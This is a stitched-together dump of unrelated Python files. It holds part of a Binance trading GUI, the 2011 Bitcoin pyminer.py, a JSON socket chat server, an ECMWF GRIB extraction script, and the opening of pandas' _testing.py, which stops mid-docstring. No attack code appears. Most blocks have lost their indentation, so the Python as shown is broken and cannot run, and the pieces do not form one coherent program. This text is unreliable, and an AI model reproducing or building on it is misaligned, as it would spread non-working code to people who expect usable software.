app.text_Sys.insert(END, sys_msg)
#__"BNBUSDT - trades"
myTuplTr = ('trades', bot.trades(symbol=grSmb, limit=1)) #Tupl
myDicGr1 = myTuplTr[1][0] #dict
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("[%d.%m.%Y %H:%M:%S] ")
sys_msg = '\n' + str(time_local_str) + ' The program is ready to work!'
app.text_Sys.insert(END, sys_msg)
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("[%d.%m.%Y %H:%M:%S] ")
sys_msg = '\n' + str(time_local_str) + ' Current chart: ' + GS
sys_msg += '\n' + str(time_local_str) + ' Current Market: ' + MS + '. Current Pairs: ' + MPS
sys_msg += '\n' + str(time_local_str) + ' Current Pair: ' + grSmb
app.text_Sys.insert(END, sys_msg)
app.text_Sys.yview(END)
if os.path.isfile('iTrader.cfg') == False:
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("[%d.%m.%Y %H:%M:%S] ")
sys_msg = '\n' + str(time_local_str) + ' The settings file is missing. You need to enter API_KEYS in the Account menu to work with the program'
else:
if os.stat("iTrader.cfg").st_size == 0:
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("[%d.%m.%Y %H:%M:%S] ")
sys_msg = '\n' + str(time_local_str) + ' The settings file is empty. You need to enter API_KEYS in the Account menu to work with the program'
else:
with open("iTrader.cfg", "r") as my_file_Account:
    l = 0
    for sss00 in my_file_Account:
        if l == 0:
            API_KEY_s = sss00.replace("\n", "")
        elif l == 1:
            API_SECRET_s = sss00.replace("\n", "")
        l += 1
if API_KEY_s == '' or API_SECRET_s =='':
l = 0
if l >= 2:
isAcc = True
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("[%d.%m.%Y %H:%M:%S] ")
sys_msg = '\n' + str(time_local_str) + ' The settings file was read successfully.'
elif l < 2:
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("[%d.%m.%Y %H:%M:%S] ")
sys_msg = '\n' + str(time_local_str) + ' The settings file was read with errors. You need to enter API_KEYS in the Account menu to work with the program'
app.text_Sys.insert(END, sys_msg)
app.text_Sys.yview(END)
if isAcc == True:
#print(API_SECRET_s)
#print(API_KEY_s)
bot = Binance(API_KEY=API_KEY_s, API_SECRET=API_SECRET_s)
#__start reading acc
myListAcc = bot.account()
#print(bot.account())
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("[%d.%m.%Y %H:%M:%S] ")
sys_msg = "\n" + str(time_local_str) + " Binance SPOT account. Permissions: " + str(myListAcc['permissions']) + '. Can Deposit: ' + str(myListAcc['canDeposit'])
sys_msg += str(". Can withdraw: ") + str(myListAcc['canWithdraw'])
app.text_Sys.insert(END, sys_msg)
app.text_Sys.yview(END)
BnFAcc = bot.ftrsGetPositionSide()
#print (BnFAcc)
if BnFAcc['dualSidePosition']==True:
app.label_HM.config(text="Position Mode: Both")
else:
app.label_HM.config(text="Position Mode: One-way")
#______________MAIN WINDOW GUI LOADING END
#______________MAIN WINDOW GUI EVENTS BEGIN
def config(event):
global grH
global grW
if event.widget == root and ep==False:
app.label_BU.place(x=event.width-210, y=10, width=200, height=40)
app.button_2.place(x=event.width-260, y=10, width=50, height=40)
app.button_AB.place(x=event.width-260, y=60, width=50, height=50)
app.label_PnL.place(x=event.width-210, y=60, width=200, height=50)
app.label_HM.place(x=event.width-210, y=120, width=200, height=40)
app.label_7.place(x=10, y=10, width=event.width-20, height=event.height-20)
app.Tree_Pos.place(x=210, y=10, width=event.width-490, height=100)
app.Tree_Pos_VScrl.place(height=100,width=10,x=event.width-280,y=10)
app.label_Grpf.place(width=event.width-440, height=event.height-320,x=10,y=150)
app.label_Ord.place(height=event.height-320,width=200,x=event.width-420,y=150)
app.label_Cmd.place(height=event.height-160,width=200,x=event.width-210,y=150)
app.label_PI.place(height=event.height-320-390,width=200,x=0,y=120)
app.Tree_PI.place(height=event.height-320-390,width=185,x=0,y=120)
app.Tree_PI_VScrl.place(height=event.height-320-390,width=10,x=185,y=120)
app.label_CmdOrd.place(height=event.height-300-(event.height-710),width=198,x=0,y=130+(event.height-320-390))
app.text_Sys.place(height=150,width=event.width-440,x=10,y=event.height-160)
app.text_Sys_Scrl.place(height=150,width=10,x=event.width-430,y=event.height-160)
app.label_P.place(x=event.width-210,y=150)
app.CB_MrgT.place(x=event.width-210,y=170)
app.CB_Lvrg.place(x=event.width-110,y=170)
app.button_MrLvSet.place(x=event.width-65,y=170)
app.CB_P.place(x=event.width-210,y=200)
app.MPSL.place(x=event.width-210,y=230)
app.SPSL.place(x=event.width-110,y=230)
if GS=='TICK':
app.graph_1.place(width=event.width-490,height=event.height-320,x=10,y=150)
elif GS in ('CANDLE 1m', 'CANDLE 5m', 'CANDLE 15m', 'CANDLE 30m', 'CANDLE 1h', 'CANDLE 4h', 'CANDLE 1d'):
app.graph_Cn.place(width=event.width-490,height=event.height-320,x=10,y=150)
app.graph_VV.place(x=10,y=event.height-300,height=100,width=event.width-490)
app.graph_BTCD.place(x=10,y=180,height=100,width=event.width-490)
elif GS=='CANDLE SUMM':
app.graph_Sm.place(width=event.width-490,height=event.height-320,x=10,y=150)
app.graph_Tb.place(x=10,y=150,height=30,width=event.width-490)
app.graph_Td.place(x=10,y=event.height-200,height=30,width=event.width-490)
if Ord_Zm==False:
app.graph_2.place(x=event.width-420,y=150,height=event.height-320,width=200)
else:
app.graph_Zm.place(x=event.width-420,y=150,height=event.height-320,width=200)
app.Scale_TP.place(height=(event.height-320-60)/2-15,width=70,x=event.width-480,y=180)
app.Scale_SL.place(height=(event.height-320-60)/2-15,width=70,x=event.width-480,y=150+45+(event.height-320-60)/2)
app.PSDvar_L.place(height=30,width=30,x=event.width-480,y=150+15+(event.height-320-60)/2)
app.PSDvar_S.place(height=30,width=30,x=event.width-480+30,y=150+15+(event.height-320-60)/2)
app.button_PTP.place(height=30,width=45,x=event.width-480,y=150)
app.button_PTPR.place(height=30,width=15,x=event.width-435,y=150)
app.button_PSL.place(height=30,width=45,x=event.width-480,y=event.height-200)
app.button_PSLR.place(height=30,width=15,x=event.width-435,y=event.height-200)
app.button_Ord.place(x=event.width-420,y=150,height=30,width=100)
app.button_OrdTmr.place(x=event.width-320,y=150,height=30,width=100)
grH = event.height-320
grW = event.width-340
root.bind("<Configure>", config)
#______________MAIN WINDOW GUI EVENTS END
root.mainloop()
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
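# NOTE: this script is Python 2 only (print statements, long literals,
# httplib, xrange); run it with a Python 2 interpreter.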
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
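# bufreverse byte-swaps every 32-bit word and wordreverse flips the word
# order; together they translate between getwork's little-endian layout and
# the big-endian hex integers compared against the target.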
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 21794
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
server.py
|
# -*- coding:utf-8 -*-
from socket import socket
import threading
import json
# id : [user name]
# action : [create | join | send_msg | broadcast | out ]
# action_value : [payload interpreted according to the action]
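# Example exchange (illustrative):
#   client -> {"id": "alice", "action": "create", "action_value": "room1"}
#   server -> {"id": "alice", "action": "resp",   "action_value": "OK"}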
class Server :
def __init__(self):
self.server_sock = socket()
self.clients = []
self.rooms = {} #{ room : [clients] }
def __client_th__(self, client_sock):
while True :
data = client_sock.recv(1024)
if not data:
    break
protocol = json.loads(data)
# TODO: the JSON payload should be validated here
id = protocol['id']
action = protocol['action']
value = protocol['action_value']
response = {'id': id,
'action': '',
'action_value': ''}
if action == 'create':
response['action'] = 'resp'
if value not in self.rooms:
self.rooms[value] = [client_sock]
client_sock.room = value
response['action_value'] = 'OK'
else:
response['action_value'] = 'ERR'
client_sock.send(json.dumps(response))
elif action == 'join':
response['action'] = 'resp'
if value in self.rooms:
self.rooms[value].append(client_sock)
client_sock.room = value
response['action_value'] = 'OK'
else:
response['action_value'] = 'ERR'
client_sock.send(json.dumps(response))
elif action == 'send_msg':
response['action'] = action
response['action_value'] = value
msg = json.dumps(response)
if hasattr(client_sock, 'room') :
for client in self.rooms[client_sock.room]:
if client != client_sock :
client.send(msg)
else: # never happens if clients only send messages after join/create
    pass # an invalid-protocol response could be sent here, but only a programming error (not user input) can reach this branch
elif action == 'broadcast':
response['action'] = action
response['action_value'] = value
msg = json.dumps(response)
for client in self.clients:
if client != client_sock :
client.send(msg)
elif action == 'exit':
if hasattr(client_sock, 'room'):
self.rooms[client_sock.room].remove(client_sock)
client_sock.close()
elif action == 'out' : # if the room owner leaves, ownership also needs to be handed over (not implemented)
pass
else :
pass # unknown protocol action
def run(self, ip, port, backlog=10):
self.server_sock.bind((ip, port))
self.server_sock.listen(backlog)
while True:
client = self.server_sock.accept()
self.clients.append(client[0])
threading.Thread(target=self.__client_th__, args=(client[0],)).start()
HOST = ''
PORT = 8000
if __name__ == '__main__':
    Server().run(HOST, PORT)
|
UComp_multiprocess_NO-INTODB.py
|
#
# Copyright 2005-2018 ECMWF.
#
# This software is licensed under the terms of the Apache Licence Version 2.0
# which can be obtained at http://www.apache.org/licenses/LICENSE-2.0.
#
# In applying this licence, ECMWF does not waive the privileges and immunities granted to it by
# virtue of its status as an intergovernmental organisation nor does it submit to any jurisdiction.
#
from __future__ import print_function
import traceback
import sys
import time
import datetime
from random import randint
#import mysql.connector
from multiprocessing import Process
from threading import Thread
from eccodes import *
INPUT = '../../data/reduced_latlon_surface.grib1'
VERBOSE = 1 # verbose error reporting
missingValue = 1e+20 # A value out of range
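# Usage (taken from the __main__ block below):
#   python UComp_multiprocess_NO-INTODB.py <year> <month> <comma-separated-grid-indexes>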
#def example(INPUT):
#def example(INPUT,y,yarr):
def example(INPUT,OUT,w,m,y,yarr):
indexarray = yarr.split(",")
forthenameoffile = yarr.replace(",", "_")
test = datetime.datetime.now()
# name = "GribIndexPoints_"+forthenameoffile+"_"+m+"_"+y+"_" +OUT+"_"+test.strftime("%d_%m_%Y_%H:%M:%S")+".csv";
# name = OUT+"_"+y+"_"+m+"_GribIndexPoints_"+forthenameoffile+"_"+test.strftime("%d_%m_%Y_%H:%M:%S")+".csv";
# name = OUT+"_"+y+"_"+m+"_GribIndexPoints_"+test.strftime("%d_%m_%Y_%H:%M:%S")+".csv";
# name = OUT+"_"+y+"_"+m+"_GribIndexPoints_Ronan_IW.csv";
# name = OUT+"_"+y+"_"+m+"_SWIMFull.csv";
# name = OUT+"_"+y+"_"+m+"_SWIMFull_started_"+test.strftime("%d_%m_%Y_%H:%M")+".csv";
# old: name = OUT+"_"+y+"_"+m+"_GribIndexPoints_"+forthenameoffile+"_started_"+test.strftime("%d_%m_%Y_%H:%M")+".csv";
name = OUT+"_"+y+"_"+m+"_GribIndexPoints_UKEA_started_"+test.strftime("%d_%m_%Y_%H_%M")+".csv";
f = open(INPUT, 'rb')
f2 = open('../../files/'+name, "a")
#critics ? ;)
# f2.write("index,lat,lon,value,dataDate,dataTime,validityDate,validityTime,name,shortname,units\n")
if w=='true':
sys.stdout.write("index,lat,lon,value,timestamp,name,shortname,units\n")
f2.write("index,lat,lon,value,dataDate,dataTime,validityDate,validityTime,name,shortname,units\n")
while 1:
gid = codes_grib_new_from_file(f)
if gid is None:
break
# Set the value representing the missing value in the field.
# Choose a missingValue that does not correspond to any real value in the data array
codes_set(gid, "missingValue", missingValue)
iterid = codes_grib_iterator_new(gid, 0)
i = 0
while 1:
result = codes_grib_iterator_next(iterid)
if not result:
break
for x in indexarray:
if i==int(x):
timestamp = ""
if codes_get(iterid, 'day') < 10:
timestamp = timestamp+"0"+str(codes_get(iterid, 'day'))
else:
timestamp = timestamp+str(codes_get(iterid, 'day'))
timestamp = timestamp+"-"+str(codes_get(iterid, 'month'))+"-"+str(codes_get(iterid, 'year'))
if codes_get(iterid, 'validityTime') == 0:
timestamp = timestamp+" 00:00:00"
elif codes_get(iterid, 'validityTime') < 1000:
eben = str(codes_get(iterid, 'validityTime'))
timestamp = timestamp+" 0"+eben[0]+":00:00"
else:
eben2 = str(codes_get(iterid, 'validityTime'))
timestamp = timestamp+" "+eben2[0]+eben2[1]+":00:00"
[lat, lon, value] = result
# sys.stdout.write("%d,%.6f,%.6f,%.6f,%s,%s,%s,%s,%s,%s,%s\n" % (i, lat, (lon-360), value, codes_get(iterid, 'dataDate'), codes_get(iterid, 'dataTime'), codes_get(iterid, 'validityDate'), codes_get(iterid, 'validityTime'), codes_get(iterid, 'name'), codes_get(iterid, 'shortName'),codes_get(iterid, 'units')))
sys.stdout.write("%d,%.6f,%.6f,%.6f,%s,%s,%s,%s\n" % (i, lat, (lon-360), value, timestamp, codes_get(iterid, 'name'), codes_get(iterid, 'shortName'),codes_get(iterid, 'units')))
f2.write("%d,%.6f,%.6f,%.6f,%s,%s,%s,%s,%s,%s,%s\n" % (i, lat, (lon-360), value, codes_get(iterid, 'dataDate'), codes_get(iterid, 'dataTime'), codes_get(iterid, 'validityDate'), codes_get(iterid, 'validityTime'), codes_get(iterid, 'name'), codes_get(iterid, 'shortName'),codes_get(iterid, 'units')))
i += 1
codes_grib_iterator_delete(iterid)
codes_release(gid)
f.close()
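# NOTE: main() below is never called; the __main__ block at the bottom of the
# file drives example() directly through multiprocessing.Process.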
def main():
try:
year=sys.argv[1]
yar=sys.argv[2]
except CodesInternalError as err:
if VERBOSE:
traceback.print_exc(file=sys.stderr)
else:
sys.stderr.write(err.msg + '\n')
return 1
if __name__ == "__main__":
year=sys.argv[1]
yar=sys.argv[3]
month=sys.argv[2]
if int(month) < 10:
    smonth = '0' + month
else:
    smonth = month
# Thread(target = example,args=('../andrew/MERA_PRODYEAR_'+year+'_12_33_105_10_0_FC3hr',year,yar)).start()
# Thread(target = example,args=('../andrew/MERA_PRODYEAR_'+str(int(year)+1)+'_01_33_105_10_0_FC3hr',str(int(year)+1),yar)).start()
# example('MERA_PRODYEAR_2016_12_61_105_0_4_FC33hr','TotalPrecip')
# Process(target = example,args=('./backup/thread/Rainfall/MERA_PRODYEAR_'+year+'_'+smonth+'_61_105_0_4_FC33hr','TotalPrecip','true',smonth,year,yar)).start()
# Process(target = example,args=('/var/www/html/mera/map/backup/thread/Press/MERA_PRODYEAR_'+year+'_'+smonth+'_1_103_0_0_FC3hr','Pressure','true',smonth,year,yar)).start()
Process(target = example,args=('/var/www/html/mera/map/backup/thread/UComp/MERA_PRODYEAR_'+year+'_'+smonth+'_33_105_10_0_FC3hr','UComp','true',smonth,year,yar)).start()
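    # Editor's note (sketch, not in the original): the worker Process above is
    # started but never joined, so the parent can exit while the child is still
    # writing. Keeping a handle and joining would tie the script's exit status
    # to the extraction finishing, e.g.:
    # p = Process(target=example, args=(...same args as above...))
    # p.start()
    # p.join()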
|
_testing.py
|
import bz2
from collections import Counter
from contextlib import contextmanager
from datetime import datetime
from functools import wraps
import gzip
import operator
import os
import re
from shutil import rmtree
import string
import tempfile
from typing import Any, Callable, ContextManager, List, Optional, Type, Union, cast
import warnings
import zipfile
import numpy as np
from numpy.random import rand, randn
from pandas._config.localization import ( # noqa:F401
can_set_locale,
get_locales,
set_locale,
)
from pandas._libs.lib import no_default
import pandas._libs.testing as _testing
from pandas._typing import Dtype, FilePathOrBuffer, FrameOrSeries
from pandas.compat import get_lzma_file, import_lzma
from pandas.core.dtypes.common import (
is_bool,
is_categorical_dtype,
is_datetime64_dtype,
is_datetime64tz_dtype,
is_extension_array_dtype,
is_interval_dtype,
is_number,
is_numeric_dtype,
is_period_dtype,
is_sequence,
is_timedelta64_dtype,
needs_i8_conversion,
)
from pandas.core.dtypes.missing import array_equivalent
import pandas as pd
from pandas import (
Categorical,
CategoricalIndex,
DataFrame,
DatetimeIndex,
Index,
IntervalIndex,
MultiIndex,
RangeIndex,
Series,
bdate_range,
)
from pandas.core.algorithms import take_1d
from pandas.core.arrays import (
DatetimeArray,
ExtensionArray,
IntervalArray,
PeriodArray,
TimedeltaArray,
period_array,
)
from pandas.core.arrays.datetimelike import DatetimeLikeArrayMixin
from pandas.io.common import urlopen
from pandas.io.formats.printing import pprint_thing
lzma = import_lzma()
_N = 30
_K = 4
_RAISE_NETWORK_ERROR_DEFAULT = False
UNSIGNED_INT_DTYPES: List[Dtype] = ["uint8", "uint16", "uint32", "uint64"]
UNSIGNED_EA_INT_DTYPES: List[Dtype] = ["UInt8", "UInt16", "UInt32", "UInt64"]
SIGNED_INT_DTYPES: List[Dtype] = [int, "int8", "int16", "int32", "int64"]
SIGNED_EA_INT_DTYPES: List[Dtype] = ["Int8", "Int16", "Int32", "Int64"]
ALL_INT_DTYPES = UNSIGNED_INT_DTYPES + SIGNED_INT_DTYPES
ALL_EA_INT_DTYPES = UNSIGNED_EA_INT_DTYPES + SIGNED_EA_INT_DTYPES
FLOAT_DTYPES: List[Dtype] = [float, "float32", "float64"]
FLOAT_EA_DTYPES: List[Dtype] = ["Float32", "Float64"]
COMPLEX_DTYPES: List[Dtype] = [complex, "complex64", "complex128"]
STRING_DTYPES: List[Dtype] = [str, "str", "U"]
DATETIME64_DTYPES: List[Dtype] = ["datetime64[ns]", "M8[ns]"]
TIMEDELTA64_DTYPES: List[Dtype] = ["timedelta64[ns]", "m8[ns]"]
BOOL_DTYPES = [bool, "bool"]
BYTES_DTYPES = [bytes, "bytes"]
OBJECT_DTYPES = [object, "object"]
ALL_REAL_DTYPES = FLOAT_DTYPES + ALL_INT_DTYPES
ALL_NUMPY_DTYPES = (
ALL_REAL_DTYPES
+ COMPLEX_DTYPES
+ STRING_DTYPES
+ DATETIME64_DTYPES
+ TIMEDELTA64_DTYPES
+ BOOL_DTYPES
+ OBJECT_DTYPES
+ BYTES_DTYPES
)
# set testing_mode
_testing_mode_warnings = (DeprecationWarning, ResourceWarning)
def set_testing_mode():
# set the testing mode filters
testing_mode = os.environ.get("PANDAS_TESTING_MODE", "None")
if "deprecate" in testing_mode:
# pandas\_testing.py:119: error: Argument 2 to "simplefilter" has
# incompatible type "Tuple[Type[DeprecationWarning],
# Type[ResourceWarning]]"; expected "Type[Warning]"
warnings.simplefilter(
"always", _testing_mode_warnings # type: ignore[arg-type]
)
def reset_testing_mode():
# reset the testing mode filters
testing_mode = os.environ.get("PANDAS_TESTING_MODE", "None")
if "deprecate" in testing_mode:
# pandas\_testing.py:126: error: Argument 2 to "simplefilter" has
# incompatible type "Tuple[Type[DeprecationWarning],
# Type[ResourceWarning]]"; expected "Type[Warning]"
warnings.simplefilter(
"ignore", _testing_mode_warnings # type: ignore[arg-type]
)
set_testing_mode()
def reset_display_options():
"""
Reset the display options for printing and representing objects.
"""
pd.reset_option("^display.", silent=True)
def round_trip_pickle(
obj: Any, path: Optional[FilePathOrBuffer] = None
) -> FrameOrSeries:
"""
Pickle an object and then read it again.
Parameters
----------
obj : any object
The object to pickle and then re-read.
path : str, path object or file-like object, default None
The path where the pickled object is written and then read.
Returns
-------
pandas object
The original object that was pickled and then re-read.
"""
_path = path
if _path is None:
_path = f"__{rands(10)}__.pickle"
with ensure_clean(_path) as temp_path:
pd.to_pickle(obj, temp_path)
return pd.read_pickle(temp_path)
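# Illustrative usage (editor's sketch, not part of pandas): round-trip a small
# Series through pickle and check it survives unchanged. Wrapped in a helper
# (the _demo_* name is a hypothetical addition) so importing the module stays
# side-effect free.
def _demo_round_trip_pickle():
    ser = Series([1, 2, 3], name="demo")
    result = round_trip_pickle(ser)
    assert_series_equal(result, ser)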
def round_trip_pathlib(writer, reader, path: Optional[str] = None):
"""
Write an object to file specified by a pathlib.Path and read it back
Parameters
----------
writer : callable bound to pandas object
IO writing function (e.g. DataFrame.to_csv )
reader : callable
IO reading function (e.g. pd.read_csv )
path : str, default None
The path where the object is written and then read.
Returns
-------
pandas object
The original object that was serialized and then re-read.
"""
import pytest
Path = pytest.importorskip("pathlib").Path
if path is None:
path = "___pathlib___"
with ensure_clean(path) as path:
writer(Path(path))
obj = reader(Path(path))
return obj
def round_trip_localpath(writer, reader, path: Optional[str] = None):
"""
Write an object to file specified by a py.path LocalPath and read it back.
Parameters
----------
writer : callable bound to pandas object
IO writing function (e.g. DataFrame.to_csv )
reader : callable
IO reading function (e.g. pd.read_csv )
path : str, default None
The path where the object is written and then read.
Returns
-------
pandas object
The original object that was serialized and then re-read.
"""
import pytest
LocalPath = pytest.importorskip("py.path").local
if path is None:
path = "___localpath___"
with ensure_clean(path) as path:
writer(LocalPath(path))
obj = reader(LocalPath(path))
return obj
@contextmanager
def decompress_file(path, compression):
"""
Open a compressed file and return a file object.
Parameters
----------
path : str
The path where the file is read from.
compression : {'gzip', 'bz2', 'zip', 'xz', None}
Name of the decompression to use
Returns
-------
file object
"""
if compression is None:
f = open(path, "rb")
elif compression == "gzip":
# pandas\_testing.py:243: error: Incompatible types in assignment
# (expression has type "IO[Any]", variable has type "BinaryIO")
f = gzip.open(path, "rb") # type: ignore[assignment]
elif compression == "bz2":
# pandas\_testing.py:245: error: Incompatible types in assignment
# (expression has type "BZ2File", variable has type "BinaryIO")
f = bz2.BZ2File(path, "rb") # type: ignore[assignment]
elif compression == "xz":
f = get_lzma_file(lzma)(path, "rb")
elif compression == "zip":
zip_file = zipfile.ZipFile(path)
zip_names = zip_file.namelist()
if len(zip_names) == 1:
# pandas\_testing.py:252: error: Incompatible types in assignment
# (expression has type "IO[bytes]", variable has type "BinaryIO")
f = zip_file.open(zip_names.pop()) # type: ignore[assignment]
else:
raise ValueError(f"ZIP file {path} error. Only one file per ZIP.")
else:
raise ValueError(f"Unrecognized compression type: {compression}")
try:
yield f
finally:
f.close()
if compression == "zip":
zip_file.close()
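# Illustrative usage (editor's sketch, not part of pandas): write a gzip file
# and read it back through decompress_file. Uses ensure_clean (defined below)
# for a throwaway path; the _demo_* name is a hypothetical addition.
def _demo_decompress_file():
    with ensure_clean("__demo__.gz") as path:
        with gzip.open(path, "wb") as fh:
            fh.write(b"payload")
        with decompress_file(path, compression="gzip") as fh:
            assert fh.read() == b"payload"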
def write_to_compressed(compression, path, data, dest="test"):
"""
Write data to a compressed file.
Parameters
----------
compression : {'gzip', 'bz2', 'zip', 'xz'}
The compression type to use.
path : str
The file path to write the data.
data : str
The data to write.
dest : str, default "test"
The destination file (for ZIP only)
Raises
------
ValueError : An invalid compression value was passed in.
"""
if compression == "zip":
compress_method = zipfile.ZipFile
elif compression == "gzip":
# pandas\_testing.py:288: error: Incompatible types in assignment
# (expression has type "Type[GzipFile]", variable has type
# "Type[ZipFile]")
compress_method = gzip.GzipFile # type: ignore[assignment]
elif compression == "bz2":
# pandas\_testing.py:290: error: Incompatible types in assignment
# (expression has type "Type[BZ2File]", variable has type
# "Type[ZipFile]")
compress_method = bz2.BZ2File # type: ignore[assignment]
elif compression == "xz":
compress_method = get_lzma_file(lzma)
else:
raise ValueError(f"Unrecognized compression type: {compression}")
if compression == "zip":
mode = "w"
args = (dest, data)
method = "writestr"
else:
mode = "wb"
# pandas\_testing.py:302: error: Incompatible types in assignment
# (expression has type "Tuple[Any]", variable has type "Tuple[Any,
# Any]")
args = (data,) # type: ignore[assignment]
method = "write"
with compress_method(path, mode=mode) as f:
getattr(f, method)(*args)
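# Illustrative round trip (editor's sketch, not part of pandas) pairing
# write_to_compressed with decompress_file; the _demo_* name is hypothetical.
def _demo_compressed_round_trip():
    data = b"a,b\n1,2\n"
    with ensure_clean("__demo__.bz2") as path:
        write_to_compressed("bz2", path, data)
        with decompress_file(path, compression="bz2") as fh:
            assert fh.read() == data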
def _get_tol_from_less_precise(check_less_precise: Union[bool, int]) -> float:
"""
Return the tolerance equivalent to the deprecated `check_less_precise`
parameter.
Parameters
----------
check_less_precise : bool or int
Returns
-------
float
Tolerance to be used as relative/absolute tolerance.
Examples
--------
>>> # Using check_less_precise as a bool:
>>> _get_tol_from_less_precise(False)
0.5e-5
>>> _get_tol_from_less_precise(True)
0.5e-3
>>> # Using check_less_precise as an int representing the decimal
>>> # tolerance intended:
>>> _get_tol_from_less_precise(2)
0.5e-2
>>> _get_tol_from_less_precise(8)
